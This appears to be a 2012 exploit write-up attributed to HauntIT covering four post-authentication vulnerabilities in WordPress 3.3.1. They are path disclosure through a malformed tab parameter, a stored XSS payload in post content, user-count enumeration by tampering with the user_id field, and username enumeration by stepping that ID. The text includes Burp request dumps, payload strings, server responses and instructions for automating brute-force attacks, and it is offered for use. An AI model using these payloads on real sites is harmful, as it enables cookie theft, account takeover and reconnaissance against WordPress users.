4 vulns wordpress 3.3.1

1. +--Exploits for WordPress 3.3.1 by HauntIT released 15.02.2012 -------+
2. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
3. 1) Post-Auth Information Disclosure
4.  
5. // a. What is the type of vulnerability?
6. This vulnerability shows us full path to Wordpress installation on server.
7. Information disclosure bug.
8.  
9. Vulnerability can be triggered by users with 'subscriber' role.
10. For some cases bug is available for 'editor'-role users too.
11.  
12. // b. Where is bug :)
13. Go to Your /wordpress/wp-admin/media-upload.php?type=image&tab='&post_id=6
14.  
15. You should see now something similar to:
16. "Fatal error: Maximum execution time of 30 seconds exceeded in
17. /path/to/your/wordpress/wp-includes/plugin.php on line 148."
18.  
19. So:
20. @Wordpress/wp-includes$ cat -n plugin.php | grep 148
21. 148 array_pop($wp_current_filter);
22.  
23. Enjoy ;)
24. --------------------------------------------------------------------------------
25. 2) Post-Auth Cross Site Scripting
26.  
27. // a. What is the type of vulnerability?
28.  
29. This is standard persistent XSS for normal (registered) user (with 'editor' role).
30.  
31. "An attacker may exploit the html-injection issue to execute arbitrary script code
32. in the browser of an unsuspecting user in the context of the saffected site. This
33. may allow to steal cookie-based authentication credentials, control how the site
34. is displayed, and launch other attacks."
35.  
36. // b. Where is bug :)
37. ...cut from Burp...
38. POST /www/Wordpress/wordpress/wp-admin/post.php HTTP/1.1
39. (...)
40. content=qqqqqqqqqqqqqqqqqqqqqq"%2f%3e%3cimg%20src%3dx%20onerror%3dalert(123)%3e%3c
41. ...cut from Burp...
42.  
43. By setting up 'content' parameter to value contains JS payload we can trigger XSS (add it
44. for other users in WP).
45.  
46. Payload to use for storing XSS could be tag 'video':
47. <video onload=<xss>>
48. ------------------------------------------------------------------------------------------
49. 3) User Count Enumeration
50.  
51. //a. What is the type of vulnerability?
52. This is very crazy bug, because, we can not enumerate _names_ of users.
53. We can't get a "information-disclosure"-kind of bug.
54. One think we can do using this bug is getting to know
55. what is the number of users in Wordpress. ;)
56.  
57. Number of users (in webapp) can be used, to determine:
58. - how "popular" is this WP-site (by "popular" I mean, how many users are registered in this site);
59. - can be used, when You're bruteforcing names in WP.
60. Here, if we can get 'number of users', we can do other thing:
61. now we know that: (for example) in webapplication we have 10 users.
62. When we get number of users, we can determine next attack: bruteforce to enumerate their (users) names.
63. So, when doing this, we have some kind of 'default login list' file for bruteforce.
64. Via this file, bruteforcing-progress tells us, that (from logins.txt) we find out 7 names.
65. So connecting this information with information from our bug - we can know, that
66. in webapplication is 3 more names(users) to 'get'.
67.  
68. I tested this vulnerability for registered user. Role for him was subscriber (so "the lowest" of registered users).
69.  
70. //b. Where is bug :)
71. Here I'll present some BurpProxy traffic dump:
72.  
73. ...cut...
74. POST /www/Wordpress/wordpress/wp-admin/profile.php HTTP/1.1
75. Host: localhost
76. (...)
77. Content-Type: application/x-www-form-urlencoded
78. Content-Length: 363
79. Connection: close
80.  
81. _wpnonce=f175245608&_wp_http_referer=%2Fwww%2FWordpress%2Fwordpress%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&admin_color=fresh&admin_bar_front=1&first_name=tester&last_name=tester&nickname=tester&display_name=tester&email=tester%40tester.com&url=&aim=&yim=&jabber=&description=&pass1=&pass2=&action=update&user_id=23 OR 1=2&submit=Update+Profile
82. ...cut...*
83.  
84. If this user_id exists, we'll get an information that:
85. - we can not edit this user/profile
86. - we can edit this user/profile (here won't be info like "now You can change other users";). If
87. we have permmitions here to change (others), we will change it (no warning or other "communicate" here)
88.  
89. If there is not user_id = (our intiger), than Wordpress tell us:
90. ...cut...
91. HTTP/1.1 500 Internal Server Error
92. Date: Wed, 15 Feb 2012 23:34:34 GMT
93. Server: Apache/2.2.17 (Ubuntu)
94. X-Powered-By: PHP/5.3.5-1ubuntu7.7
95. Expires: Wed, 11 Jan 1984 05:00:00 GMT
96. Last-Modified: Wed, 15 Feb 2012 23:34:35 GMT
97. Cache-Control: no-cache, must-revalidate, max-age=0
98. Pragma: no-cache
99. X-Frame-Options: SAMEORIGIN
100. Vary: Accept-Encoding
101. Connection: close
102. Content-Type: text/html; charset=utf-8
103. Content-Length: 2923
104.  
105. <!DOCTYPE html>
106. <!-- Ticket #11289, IE bug fix:(...) -->
107. <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
108. <head>
109. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
110. <title>WordPress &rsaquo; Error</title>
111. <style type="text/css">
112. (...)
113.  
114. </style>
115. </head>
116. <body id="error-page">
117. <p>Invalid user ID.</p></body>
118. </html>
119.  
120.  
121. ...cut...
122.  
123. So now by bruteforcing numbers with this HTTP POST, authenticated (normal registered) user
124. can find out how many users is in the application.
125.  
126. -----------------------------------------------------------------------------------------
127. 4) Post-Auth SQL Injection
128.  
129. //a. What is the type of vulnerability?
130. This is kind of wierd SQL Injection (or parameter manipulation for 'priviledge escalation').
131. For user who has admin access there is functionality like "show all users in webapp".
132. For normal user (registered, with "role" rights), there isn't functionality like this.
133. But using Wordpress in way that it is not designed to, we can get all user-names in
134. latest(/installed) WordPress (3.3.1).
135.  
136. //b. Where is bug :
137. To trigger this vulnerability, we must log in as a normal (registered/role rights) user.
138. You should know that this descriptions is covering getting only 1 username.
139. To automate this process to enumerate all users, write Your own PoC. ;)
140.  
141. If You're logged in as a normal user ("subscriber"), go to:
142. wordpress/wp-admin/profile.php
143.  
144. Now You should set parameters like this:
145. ?_wpnonce=&
146. _wp_http_referer=&
147. from=profile&
148. checkuser_id=&
149. admin_color=&
150. admin_bar_front=&
151. first_name=last_name=&
152. nickname=&
153. display_name=&
154. email=tester@tester.com&
155. url=&
156. aim=&
157. yim=&
158. jabber=&
159. description=&
160. pass1=&
161. pass2=&
162. action=update&
163. user_id=3
164.  
165. Vulnerable parameter is (the last) "user_id".
166. When we set this parameter value to other integer value, we can get names of other users in webapp.
167. Information about name will back to us in error page (so for automate attacks You should
168. use something similar to n+1 (for value of user_id parameter).
169.  
170. I wrote similar tool for 3.2.1 version, here it is:
171. http://hauntit.blogspot.com/2011/09/wordpress-321-user-enumeration.html
172.  
173. Cheers!
174. -----------------------------------------------------------------------------------------
175. end of paper.
176. -----------------------------------------------------------------------------------------
177. visit us hack4life.com.ar